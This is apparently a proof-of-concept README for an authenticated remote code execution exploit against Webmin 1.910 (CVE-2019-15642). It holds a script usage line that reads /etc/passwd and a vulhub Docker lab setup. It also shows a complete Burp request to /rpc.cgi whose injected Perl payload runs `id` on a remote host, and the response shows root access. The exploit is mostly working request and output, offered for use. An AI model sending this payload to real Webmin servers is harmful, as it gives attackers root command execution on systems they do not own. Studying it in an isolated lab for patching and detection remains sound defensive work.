Home

Awesome

CVE-2019-15642 Webmin Remote Code Execution (authenticated)

python Usage:

python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"

0x01 docker for Webmin

cd ~/vulhub/webmin/CVE-2019-15107

docker-compose up -d

root@9460493fa985:/# passwd root

Webmin > username=root,password=root

 ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d
Creating network "cve-2019-15107_default" with the default driver
Pulling web (vulhub/webmin:1.910)...
1.910: Pulling from vulhub/webmin
db0035920883: Pull complete
d3665f2ef942: Pull complete
08a7da7cdc97: Pull complete
059181cc3fe2: Pull complete
Digest: sha256:ea48cb0e1393fe0247f910c039aa143bbdd74eaecadc44fbe68d2f7e86e037b3
Status: Downloaded newer image for vulhub/webmin:1.910
Creating cve-2019-15107_web_1 ... done

 ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker ps -a
CONTAINER ID        IMAGE                         COMMAND                  CREATED             STATUS              PORTS                      NAMES
9460493fa985        vulhub/webmin:1.910           "/docker-entrypoin..."   14 minutes ago      Up 14 minutes       0.0.0.0:10000->10000/tcp   cve-2019-15107_web_1

 ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker exec -it 9460493fa985 /bin/bash
root@9460493fa985:/# ls

root@9460493fa985:/# passwd root
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
root@9460493fa985:/# 


0x02 login for Webmin

username=root
password=root
>>>Authorization: Basic cm9vdDpyb290

0x03 Command Execute Burpsuite

Burp Request

POST /rpc.cgi HTTP/1.1
Host: hk.canyouseeme.cc:10000
User-Agent: webmin
Connection: close
Content-Type: application/x-www-form-urlencoded
Authorization: Basic cm9vdDpyb290
Content-Length: 70

OBJECT CGI;print "Content-Type: Jas502n\n\n\n";$cmd=`id`;print "$cmd";

Burp Response

HTTP/1.0 200 Document follows
Date: Sun, 1 Sep 2019 09:35:24 GMT
Server: MiniServ/1.910
Connection: close
Content-Type: Jas502n


uid=0(root) gid=0(root) groups=0(root)
Content-type: text/plain


参考链接

https://twitter.com/chybeta/status/1167617571287289856

https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107